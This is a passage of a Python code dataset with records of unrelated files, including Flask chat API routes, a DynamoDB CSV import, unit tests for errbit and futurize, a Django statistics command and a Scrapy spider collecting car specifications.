jsonify(Error=\"Method not allowed.\"), 405\n\n\n@app.route('/Pictochat/chats/all', methods=['GET', 'POST'])\ndef getAllChats():\n if request.method == 'GET':\n result = Chat.getAllChats()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/chat/<chat_id>', methods=['GET'])\ndef getChatByID(chat_id):\n if request.method == 'GET':\n result = Chat.getChatByID(chat_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/chats/<user_id>', methods=['GET'])\ndef getChatByUserID(user_id):\n if request.method == 'GET':\n result = Chat.getChatByUserID(user_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/chat/<chat_id>/posts', methods=['GET', 'POST'])\ndef getPostsByChatID(chat_id):\n if request.method == 'GET':\n result = Post.getPostsByChatIDForUI(chat_id)\n return result\n elif request.method == 'POST':\n result = Post.insertMessage(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Post Routes ########################\n\n@app.route('/Pictochat/post/new', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef 
createPost():\n if request.method == 'POST':\n if allowed_file(request.files['file'].filename):\n User.registerActivity()\n return Post.createPost(request.form, request.files['file'], app.config['UPLOAD_FOLDER'])\n return jsonify(Error=\"File extension not allowed\"), 405\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/posts/all', methods=['GET'])\ndef getAllPosts():\n if request.method == 'GET':\n result = Post.getAllPost()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Hashtag Routes ######################\n\n\n###################### Reaction Routes ############################\n\n@app.route('/Pictochat/post/react', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef reactPost():\n if request.method == 'POST':\n User.registerActivity()\n result = Post.reactPost(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post/<post_id>/count/likes', methods=['GET'])\ndef getPostLikesCountByID(post_id):\n if request.method == 'GET':\n result = Post.getPostLikesCountByID(post_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post/<post_id>/count/dislikes', methods=['GET'])\ndef getPostDislikesCountByID(post_id):\n if request.method == 'GET':\n result = Post.getPostDislikesCountByID(post_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Participant Routes ######################\n\n@app.route('/Pictochat/chat/addparticipants', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef addParticipants():\n if request.method == 'POST':\n result = Chat.addParticipants(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Media Routes ######################\n\n@app.route('/Pictochat/post/insertmedia', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef insertMedia():\n if request.method == 'POST':\n result = Post.insertMedia(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post/<post_id>/media', methods=['GET', 'POST'])\ndef getMediaByPostID(post_id):\n if request.method == 'GET':\n result = Post.getMediaByPostID(post_id)\n return result\n elif request.method == 'POST':\n result = Post.insertMedia(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Reply Routes ########################\n\n@app.route('/Pictochat/post/reply', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef reply():\n if request.method == 'POST':\n User.registerActivity()\n result = Post.reply(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post/<post_id>/replies', methods=['GET'])\ndef getRepliesByPostID(post_id):\n if request.method == 'GET':\n result = Post.getRepliesByPostID(post_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Dashboard Routes ########################\n\n\n@app.route('/Pictochat/dashboard/hashtags', methods=['GET'])\ndef getTrendingHashtags():\n if request.method == 'GET':\n result = Post.getTrendingHashtags()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/posts', 
methods=['GET'])\ndef getPostPerDay():\n if request.method == 'GET':\n result = Post.getPostPerDay()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/replies', methods=['GET'])\ndef getRepliesPerDay():\n if request.method == 'GET':\n result = postDao.getRepliesPerDay()\n return jsonify(RepliesPerDay=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/likes', methods=['GET'])\ndef getLikesPerDay():\n if request.method == 'GET':\n result = postDao.getLikesPerDay()\n return jsonify(LikesPerDay=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/dislikes', methods=['GET'])\ndef getDislikesPerDay():\n if request.method == 'GET':\n result = postDao.getDislikesPerDay()\n return jsonify(DislikesPerDay=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/post/replies', methods=['GET'])\ndef getRepliesPerPost():\n if request.method == 'GET':\n result = postDao.getRepliesPerPost()\n return jsonify(RepliesPerPost=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/post/likes', methods=['GET'])\ndef getLikesPerPost():\n if request.method == 'GET':\n result = postDao.getLikesPerPost()\n return jsonify(LikesPerPost=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/post/dislikes', methods=['GET'])\ndef getDislikesPerPost():\n if request.method == 'GET':\n result = postDao.getDislikesPerPost()\n return jsonify(DislikesPerPost=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/user/active', methods=['GET'])\ndef getTopThreeActiveUsers():\n if request.method == 'GET':\n result = userDao.getTopThreeActiveUsers()\n return jsonify(TopThreeActiveUsers=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"287878152","text":"dict1 = {\"a\": 100, \"b\": 200, \"c\": 300}\n\n# swap the positions of the keys and values\ndict2 = {}\nfor k, v in dict1.items():\n dict2[v] = k\nprint(dict2)\n\n\ndict3 = {v: k for k, v in dict1.items()}\nprint(dict3)","sub_path":"study01/day04/17-字典练习2.py","file_name":"17-字典练习2.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"638447998","text":"import logging\nimport asyncio\nimport time\nfrom functools import partial\nfrom mysleep import mysleep\n\nlogger = logging.getLogger(__name__)\n\n\nasync def run():\n loop = asyncio.get_event_loop()\n st = time.time()\n logger.info(\"**start**\")\n result = await asyncio.gather(\n *[\n loop.run_in_executor(None, partial(mysleep, \"x\", 1)),\n loop.run_in_executor(None, partial(mysleep, \"y\", 1)),\n loop.run_in_executor(None, partial(mysleep, \"z\", 2)),\n ]\n )\n logger.info(\"**end** %r %r\", result, time.time() - st)\n\n\nlogging.basicConfig(level=logging.DEBUG, format=\"%(asctime)s\" + logging.BASIC_FORMAT)\nasyncio.run(run(), debug=True)\n","sub_path":"daily/20190320/example_asyncio/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
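# A minimal, self-contained sketch of the run_in_executor + gather pattern from
# the 20.py record above. The real `mysleep` helper is imported from a sibling
# module there; its mysleep(label, seconds) signature is assumed from the call
# sites, so a blocking stand-in is defined here.
import asyncio
import time
from functools import partial


def mysleep(label, seconds):
    # Blocking stand-in for the imported helper.
    time.sleep(seconds)
    return label, seconds


async def run():
    loop = asyncio.get_running_loop()
    start = time.time()
    # Each blocking call is handed to the default thread-pool executor, so the
    # three sleeps overlap instead of running back to back.
    results = await asyncio.gather(
        loop.run_in_executor(None, partial(mysleep, "x", 1)),
        loop.run_in_executor(None, partial(mysleep, "y", 1)),
        loop.run_in_executor(None, partial(mysleep, "z", 2)),
    )
    print(results, time.time() - start)  # roughly 2 seconds of wall time, not 4


asyncio.run(run())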
+{"seq_id":"29141815","text":"import boto3\r\n\r\ndef import_csv_to_dynamodb(table_name, csv_file_name, column_names, column_types):\r\n dynamodb = boto3.resource('dynamodb')\r\n table = dynamodb.Table(table_name)\r\n \r\n csv_file = open(csv_file_name, 'r')\r\n with table.batch_writer() as batch:\r\n for cur_line in csv_file:\r\n cur_line = cur_line.strip().split(',')\r\n \r\n row = {}\r\n for column_number, column_name in enumerate(column_names):\r\n row[column_name] = cur_line[column_number]\r\n\r\n print(str(row['name']))\r\n batch.put_item(\r\n Item={\r\n 'box': row['box'],\r\n 'name': row['name'],\r\n 'cardType': row['cardType'],\r\n 'cost': row['cost'],\r\n 'pickable': row['pickable'],\r\n 'setup': row['setup']\r\n }\r\n )\r\n\r\n csv_file.close()\r\n\r\n\r\ndef main():\r\n column_names = 'box name cardType cost pickable setup'.split()\r\n table_name = 'DominionCards'\r\n csv_file_name = 'menagerie.csv'\r\n column_types = [str, str, int, bool, str, str]\r\n import_csv_to_dynamodb(table_name, csv_file_name, column_names, column_types)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"46082507","text":"from errbit.client import Client\nfrom mocker import MockerTestCase\nimport os\nimport pkg_resources\nimport sys\n\n\nERRBIT_VERSION = pkg_resources.require('errbit')[0].version\nREQUESTS_VERSION = pkg_resources.require('requests')[0].version\n\ntry:\n raise AttributeError(\"Foo instance has no attribute 'bar'\")\nexcept:\n EXC_INFO = sys.exc_info()\n\n\nclass TestClient(MockerTestCase):\n\n def tearDown(self):\n for key in filter(lambda key: key.startswith('ERRBIT_'),\n os.environ.keys()):\n del os.environ[key]\n\n def test_set_api_key_with_environment_variables(self):\n os.environ['ERRBIT_API_KEY'] = 'abcd1234'\n client = Client()\n self.assertEquals('abcd1234', client.get_api_key())\n\n def test_configure_errbit_url_with_environment_variable(self):\n os.environ['ERRBIT_URL'] = 'http://errbit.local/api'\n\n client = Client()\n self.assertEquals('http://errbit.local/api', client.get_errbit_url())\n\n def test_posting_exception(self):\n os.environ['ERRBIT_API_KEY'] = 'abcd1234'\n os.environ['ERRBIT_URL'] = 'http://errbit.local/api'\n request_data = {'url': 'http://foo/bar'}\n env_data = {'project-root': os.getcwd()}\n client = Client()\n\n xmlgenerator = self.mocker.replace('errbit.xmlgenerator.generate_xml')\n self.expect(xmlgenerator('abcd1234', client.get_notifier(),\n EXC_INFO, request=request_data, environment=env_data)\n ).result('')\n\n req_class = self.mocker.replace('errbit.request.ThreadedRequest')\n req = self.mocker.mock()\n self.expect(req_class('http://errbit.local/api', '')).result(req)\n self.expect(req.start())\n\n self.mocker.replay()\n client.post(EXC_INFO, request=request_data)\n","sub_path":"errbit/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"583743514","text":"\"\"\"\nThis module contains snippets of Python 2 code (invalid Python 3) and\ntests for whether they can be passed to ``futurize`` and immediately\nrun under both Python 2 again and Python 3.\n\"\"\"\n\nfrom __future__ import print_function, absolute_import\n\nimport unittest\nimport pprint\nfrom subprocess import Popen, PIPE\nimport tempfile\nimport 
os\n\nfrom future.tests.base import CodeHandler\n\n\nclass TestFuturizeSimple(CodeHandler, unittest.TestCase):\n def setUp(self):\n self.interpreters = ['python']\n self.tempdir = tempfile.mkdtemp() + os.path.sep\n self.env = {'PYTHONPATH': os.getcwd()}\n\n def test_xrange(self):\n code = '''\n for i in xrange(10):\n pass\n '''\n self.simple_convert_and_run(code)\n\n def test_range_slice(self):\n \"\"\"\n This should run on Py2 without a MemoryError\n \"\"\"\n code = '''\n for i in range(10**15)[:10]:\n pass\n '''\n self.simple_convert_and_run(code)\n\n def test_super(self):\n \"\"\"\n Ensure the old method of calling super() still works.\n \"\"\"\n code = '''\n class VerboseList(list):\n def append(self, item):\n print 'Adding an item'\n super(VerboseList, self).append(item)\n '''\n self.simple_convert_and_run(code)\n\n def test_apply(self):\n code = '''\n def addup(*x):\n return sum(x)\n \n assert apply(addup, (10,20)) == 30\n '''\n self.simple_convert_and_run(code)\n \n def test_renamed_modules(self):\n code = '''\n import ConfigParser\n import copy_reg\n import cPickle\n import cStringIO\n '''\n self.simple_convert_and_run(code)\n \n @unittest.skip('not implemented yet')\n def test_download_pypi_package_and_test(self, package_name='future'):\n URL = 'http://pypi.python.org/pypi/{}/json'\n \n from future import standard_library\n import requests\n r = requests.get(URL.format(package_name))\n pprint.pprint(r.json())\n \n download_url = r.json()['urls'][0]['url']\n filename = r.json()['urls'][0]['filename']\n # r2 = requests.get(download_url)\n # with open('/tmp/' + filename, 'w') as tarball:\n # tarball.write(r2.content)\n\n # Ideally, we'd be able to use code like this:\n # import urllib.request\n # \n # r = urllib.request.urlopen(URL.format(package_name))\n # pprint.pprint(r.read()) \n\n def test_raw_input(self):\n \"\"\"\n Passes in a string to the waiting input() after futurize\n conversion.\n\n The code is the first snippet from these docs:\n http://docs.python.org/2/library/2to3.html\n \"\"\"\n py2code = '''\n from future.builtins import *\n def greet(name):\n print \"Hello, {0}!\".format(name)\n print \"What's your name?\"\n name = raw_input()\n greet(name)\n '''\n self._write_test_script(py2code)\n output = self._futurize_test_script()\n\n for interpreter in self.interpreters:\n p1 = Popen([interpreter, self.tempdir + 'mytestscript.py'],\n stdout=PIPE, stdin=PIPE, stderr=PIPE, env=self.env)\n (stdout, stderr) = p1.communicate(b'Ed')\n # print(stdout)\n # print(stderr)\n self.assertEqual(stdout, b\"What's your name?\\nHello, Ed!\\n\")\n\n def test_u_prefixes_are_not_stripped(self):\n \"\"\"\n Tests to ensure that the u'' prefixes on unicode strings are not\n removed by the futurize script. 
Removing the prefixes on Py3.3+ is\n unnecessary and loses some information -- namely, that the strings have\n explicitly been marked as unicode, rather than just the futurize\n script's guess (perhaps incorrect) that they should be unicode.\n \"\"\"\n code = '''\n s = u'Hello'\n '''\n newcode = self.simple_convert(code)\n self.assertTrue(\"s = u'Hello'\" in newcode)\n\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"future/tests/test_futurize.py","file_name":"test_futurize.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"357023627","text":"from sklearn.gaussian_process import GaussianProcessRegressor, kernels\nfrom skopt.space import Categorical, Integer, Real\n\nfrom src.hyper_opt.run import run_hyper_opt\n\nspace = (\n Categorical([\"Matern\", \"RBF\", \"RationalQuadratic\", \"ExpSineSquared\"], name=\"kernel\"),\n Integer(0, 5, name=\"n_restarts_optimizer\"),\n Real(1e-12, 1e-8, prior=\"log-uniform\", name=\"alpha\"),\n)\n\n\ndef build_model_and_run(params, X_train, y_train, X_test):\n kernel = getattr(kernels, params.pop(\"kernel\"))()\n model = GaussianProcessRegressor(kernel=kernel, **params, random_state=0)\n model.fit(X_train, y_train)\n y_pred, y_std = model.predict(X_test, return_std=True)\n y_std[y_std <= 0] = 1e-6\n return y_pred, y_std\n\n\nrun_hyper_opt(\n build_model_and_run, space=space, log_dir_model=\"gp/hyper_opt\", labels=\"resistivity\"\n)\n","sub_path":"src/gp/hyper_opt.py","file_name":"hyper_opt.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"73840120","text":"\n#coding:utf-8\n'''\nCreated on 2017-04-12\n\n@author: lch\n'''\nimport logging\nfrom wafuli.models import *\nimport time as ttime\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Sum,F\nfrom account.models import MyUser, Channel\nfrom django.conf import settings\nfrom decimal import Decimal\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import F\nfrom project_admin.models import ProjectStatis, DayStatis, Project,\\\n ProjectInvestData, AccountBill, Account, DayAccountStatic\nimport logging\nimport time\nlogger = logging.getLogger(\"wafuli\")\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n logger.info(\"******Project_statis is beginning*********\")\n begin_time = time.time()\n today = datetime.date.today()\n from django.db import connection, transaction\n cursor = connection.cursor()\n cursor.execute(\"select a.project_id, a.source, sum(a.settle_amount) as sumofsettle, \\\n sum(a.return_amount) as sumofret from project_admin_projectinvestdata a \\\n group by a.project_id, a.source\")\n # Data-modifying operations -- a commit is required\n# cursor.execute(\"select b.is_channel, a.audit_state, \\\n# sum(invest_amount) as sum, count(*) as count from wafuli_userevent a join account_myuser b\\\n# on a.user_id=b.id group by a.audit_state, b.is_channel\")\n# transaction.commit_unless_managed()\n \n # Data-retrieval operations, no commit needed\n# cursor.execute(\"SELECT foo FROM bar WHERE baz = %s\", [self.baz])\n row = cursor.fetchall()\n project_dic = {}\n for item in row:\n id = item[0]\n source = item[1]\n consume = item[2]\n ret = item[3]\n attr = {}\n if project_dic.has_key(id):\n attr = project_dic[id]\n else:\n project_dic[id] = attr\n if source == 'site':\n attr['site_consume'] = consume\n attr['site_return'] = ret\n elif source == 'channel':\n attr['channel_consume'] = consume\n 
attr['channel_return'] = ret\n# print project_dic \n for id, kwarg in project_dic.items():\n obj,created = ProjectStatis.objects.update_or_create(project_id=id, defaults=kwarg)\n Project.objects.filter(id=id).update(consume=obj.consume())\n# return row\n update_fields = {}\n update_fields['start_num'] = Project.objects.filter(state='start').count()\n update_fields['finish_num'] = Project.objects.filter(state='finish').count()\n update_fields['invest_count'] = ProjectInvestData.objects.filter(invest_time=today).count()\n statdic = ProjectInvestData.objects.filter(invest_time=today).aggregate(invest_sum=Sum('invest_amount'),\n consume_sum=Sum('settle_amount'))\n update_fields['ret_count'] = ProjectInvestData.objects.filter(invest_time=today, state='0').count()\n statdic_pass = ProjectInvestData.objects.filter(invest_time=today, state='0').aggregate(\n ret_invest_sum=Sum('invest_amount'), ret_sum=Sum('return_amount'))\n update_fields.update(statdic)\n update_fields.update(statdic_pass)\n obj, created = DayStatis.objects.update_or_create(date=today, defaults=update_fields)\n# cursor.execute(\"select a.project_id, a.source, sum(a.settle_amount) as sumofsettle, \\\n# sum(a.return_amount) as sumofret from project_admin_projectinvestdata a \\\n# group by a.project_id, a.source\")\n update_fields = {}\n income = AccountBill.objects.filter(time__gte=today, type='income').aggregate(income=Sum('amount'))\n expenditure = AccountBill.objects.filter(time__gte=today, type='expend').aggregate(expenditure=Sum('amount'))\n balance = Account.objects.aggregate(balance=Sum('balance'))\n update_fields.update(income)\n update_fields.update(expenditure)\n update_fields.update(balance)\n obj, created = DayAccountStatic.objects.update_or_create(date=today, defaults=update_fields)\n \n end_time = time.time()\n logger.info(\"******Project_statis is finished, time:%s*********\",end_time-begin_time)","sub_path":"wafuli_admin/management/commands/project_statis.py","file_name":"project_statis.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"407703325","text":"print(\"\"\"\n7. 
Generate and print a 10 x 10 matrix whose elements have the form:\nA[i][j] = 2i + 7j - 2 if i < j;\nA[i][j] = 3i² – 1 if i = j;\nA[i][j] = 4i³ – 5j² + 1 if i > j.\n\"\"\")\n\nlinhas = list()\nmatriz = list()\n\nfor i in range(10):\n for j in range(10):\n if i < j:\n linhas.append(((2*i) + (7*j)) - 2)\n\n elif i == j:\n linhas.append((3 * (i ** 2)) - 1)\n\n elif i > j:\n linhas.append((4 * (i ** 3)) - (5 * (j ** 2)) + 1)\n\n else:\n pass\n matriz.append(linhas)\n linhas = list()\n\nmatriz_str = matriz.copy()\n\nfor linha in matriz_str:\n for coluna in range(len(linha)):\n linha[coluna] = str(linha[coluna]).center(5)\n print(*linha)\n\nlista = [int(input(f'Enter number {num + 1}: ')) for num in range(int(input('Range: ')))]\nprint(f'Largest value: {max(lista)}, Position: {lista.index(max(lista))}', f'\\nSmallest value: {min(lista)}, Position: {lista.index(min(lista))}')\n","sub_path":"Seção_07/parte_2/Exercício_07.py","file_name":"Exercício_07.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"139614759","text":"import copy\nimport hashlib\nimport json\nimport time\n\nimport re\n\nfrom ..items import che58_newcar\nimport scrapy\nfrom scrapy.conf import settings\n\nwebsite = 'che58_newcar'\n\n\n# loop over the cities first, then over the cars\nclass CarSpider(scrapy.Spider):\n name = website\n start_urls = [\n \"https://product.58che.com/price_list/brand_1_1.shtml\"]\n headers = {\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36',\n 'Sec-Fetch-Dest': 'document',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n }\n custom_settings = {\n 'DOWNLOAD_DELAY': 0.5,\n 'CONCURRENT_REQUESTS': 15,\n \"COOKIES_ENABLED\": False\n }\n\n def __init__(self, **kwargs):\n super(CarSpider, self).__init__(**kwargs)\n settings.set('WEBSITE', website, priority='cmdline')\n settings.set('MONGODB_COLLECTION', website, priority='cmdline')\n settings.set(\"MONGODB_DB\", \"newcar\", priority=\"cmdline\")\n self.counts = 0\n\n def parse(self, response):\n brand_list = response.xpath(\"//a[@class='first']/@title\").extract()\n brand_id_list = response.xpath(\"//a[@class='first']/@href\").extract()\n brand_dict = dict(zip(brand_list, brand_id_list))\n for i in brand_dict.items():\n brand_id = re.findall(\"_(\\d*)_\", i[1])[0]\n url = \"https://product.58che.com/index.php?c=Ajax_AjaxFirmCarLine\"\n yield scrapy.FormRequest(url=url, formdata={\"brandId\": brand_id},\n meta={\"brand_name\": i[0], \"brand_id\": brand_id}, callback=self.parse_fnf,\n headers=self.headers,\n dont_filter=True)\n\n def parse_fnf(self, response):\n data = json.loads(response.text)\n for i in data['firmCarLineArr']:\n for j in data['firmCarLineArr'][i]:\n for z in data['firmCarLineArr'][i][j]:\n factoty_name = data['firmCarLineArr'][i][j][\"name\"]\n factoty_id = data['firmCarLineArr'][i][j][\"firmId\"]\n if isinstance(data['firmCarLineArr'][i][j][\"lineInfo\"], dict):\n for x in data['firmCarLineArr'][i][j][\"lineInfo\"].items():\n serier_name = x[1][\"name\"]\n factoty_name = factoty_name\n factoty_id = factoty_id\n serier_id = x[1][\"lineId\"]\n url = \"https://product.58che.com\" + x[1][\"lineUrl\"]\n url_list = []\n id = 
url.split(\"/\")[-2]\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_4.shtml\".format(id),\n \"stat\": \"停售\"}) # 4\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_2.shtml\".format(id),\n \"stat\": \"停产在售\"}) # 2\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_3.shtml\".format(id),\n \"stat\": \"即将上市\"})\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_1.shtml\".format(id),\n \"stat\": \"在售\"})\n for c in url_list:\n item = {}\n item[\"serier_name\"] = serier_name\n item[\"factoty_name\"] = factoty_name\n item[\"factoty_id\"] = factoty_id\n item[\"serier_id\"] = serier_id\n item[\"stat\"] = c[\"stat\"]\n item[\"used_url\"] = c[\"url\"]\n response.meta.update(item)\n meta = copy.deepcopy(response.meta)\n print(meta)\n\n yield scrapy.Request(url=c[\"url\"], meta=meta, headers=self.headers,\n callback=self.parse_family,dont_filter=True)\n else:\n for x in data['firmCarLineArr'][i][j][\"lineInfo\"]:\n serier_name = x[\"name\"]\n factoty_name = factoty_name\n factoty_id = factoty_id\n serier_id = x[\"lineId\"]\n url = \"https://product.58che.com/\" + x[\"lineUrl\"]\n url_list = []\n id = url.split(\"/\")[-2]\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_4.shtml\".format(id),\n \"stat\": \"停售\"}) # 4\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_2.shtml\".format(id),\n \"stat\": \"停产在售\"}) # 2\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_3.shtml\".format(id),\n \"stat\": \"即将上市\"})\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_1.shtml\".format(id),\n \"stat\": \"在售\"})\n for c in url_list:\n item = {}\n item[\"serier_name\"] = serier_name\n item[\"factoty_name\"] = factoty_name\n item[\"factoty_id\"] = factoty_id\n item[\"serier_id\"] = serier_id\n item[\"stat\"] = c[\"stat\"]\n item[\"used_url\"] = c[\"url\"]\n response.meta.update(item)\n meta = copy.deepcopy(response.meta)\n print(meta)\n yield scrapy.Request(url=c[\"url\"], meta=meta, headers=self.headers,\n callback=self.parse_family,dont_filter=True)\n\n def parse_family(self, response):\n url_list = response.xpath(\"//td[@class='marg']/a[1]/@href\").extract()\n for url in url_list:\n url = \"https:\" + url.replace(\"config\", \"param\")\n yield scrapy.Request(url=url, meta=response.meta, headers=self.headers,\n callback=self.parse_family2,dont_filter=True)\n\n def md5_encryption(self, data):\n # 获取sign\n m = hashlib.md5()\n url_md5 = (data).encode(encoding='utf-8')\n m.update(url_md5)\n url_md5 = m.hexdigest()\n return url_md5\n def parse_family2(self, response):\n canshu_list = response.xpath(\"//div[@id='peizhi']//td\")\n canshu_dict = {}\n for i in canshu_list:\n canshu_key = i.xpath(\".//span[1]/text()\").extract_first()\n if canshu_key == None:\n canshu_key = i.xpath(\".//a/text()\").extract_first()\n canshu_value = i.xpath(\".//span[2]/text()\").extract_first()\n if canshu_key != None:\n canshu_dict.update({canshu_key: canshu_value})\n item = che58_newcar()\n item[\"grab_time\"] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n item[\"url\"] = response.url\n item[\"brand_name\"] = response.meta[\"brand_name\"]\n item[\"brand_id\"] = response.meta[\"brand_id\"]\n item[\"serier_id\"] = response.meta[\"serier_id\"]\n item[\"serier_name\"] = response.meta[\"serier_name\"]\n item[\"factoty_name\"] = response.meta[\"factoty_name\"]\n item[\"factoty_id\"] = response.meta[\"factoty_id\"]\n car_stat = 
response.meta[\"used_url\"].split(\"/\")[-1]\n if '1' in car_stat:\n item[\"stat\"] = \"在售\"\n elif '2' in car_stat:\n item[\"stat\"] = \"停产在售\"\n elif '3' in car_stat:\n item[\"stat\"] = \"即将上市\"\n elif '4' in car_stat:\n item[\"stat\"] = \"停售\"\n item[\"model_id\"] = re.findall(\"/(\\d*)/param\", response.url)[0]\n item[\"model_name\"] = response.xpath(\"//h3/a/text()\").extract_first()\n item[\"short_desc\"] = response.xpath(\"//h3/a/text()\").extract_first()\n item[\"Dealer_price\"] = response.xpath(\"//span[contains(text(),'经销商报价:')]/../span[2]/text()\").extract_first()\n item[\"guide_price\"] = response.xpath(\"//span[contains(text(),'厂商指导价')]/../span[2]/text()\").extract_first()\n item[\"speed\"] = response.xpath(\"//span[contains(text(),'变速箱:')]/../span[2]/text()\").extract_first()\n item[\"output\"] = response.xpath(\"//span[contains(text(),'排量')]/../span[2]/text()\").extract_first()\n item[\"drive_type\"] = response.xpath(\"//span[contains(text(),'驱动方式')]/../span[2]/text()\").extract_first()\n item[\"doors\"] = response.xpath(\"//span[contains(text(),'车门数')]/../span[2]/text()\").extract_first()\n item[\"seat\"] = response.xpath(\"//span[contains(text(),'座位')]/../span[2]/text()\").extract_first()\n item[\"air_inlet\"] = response.xpath(\"//span[contains(text(),'进气')]/../span[2]/text()\").extract_first()\n item[\"fuel_type\"] = response.xpath(\"//span[contains(text(),'燃油类型')]/../span[2]/text()\").extract_first()\n item[\"body\"] = response.xpath(\"//span[contains(text(),'车身结构')]/../span[2]/text()\").extract_first()\n item[\"makeyear\"] = response.xpath(\"//span[contains(text(),'款型')]/../span[2]/text()\").extract_first()\n item[\"environment\"] = json.dumps(canshu_dict, ensure_ascii=False)\n item[\"statusplus\"] = response.url + self.md5_encryption(str(canshu_dict)) + str(3)\n yield item\n","sub_path":"old_guazi/guazi/guazi/build/lib/guazi/spiders/che58_newcar.py","file_name":"che58_newcar.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124884604","text":"__author__ = 'Mart'\n\"\"\" Common Functions for the data \"\"\"\nimport BeautifulSoup\nfrom database.management import friendsGetFirstDegree\n\n#Method for removing the newlines\naha = \"\"\"=\n\"\"\"\nenter = \"\"\"\n\"\"\"\n\ndef loadDocument(name):\n with open(name,'r') as m:\n data = m.read().replace('\\n\\r','')\n return fixData(data)\n\ndef fixData(data):\n \"\"\"Fix the data, that has been corrupted by the saving method\"\"\"\n data = data.replace(\"'3D\\\"_5q6s' _8o=\\\"_8o\\\" _8t=\\\"_8t\\\" lfloat=\\\"lfloat\\\" _oh='e\\\"'\",'class=\"_5q6s _8o _8t lfloat _ohe\"')\n data = data.replace(aha, '')\n data = 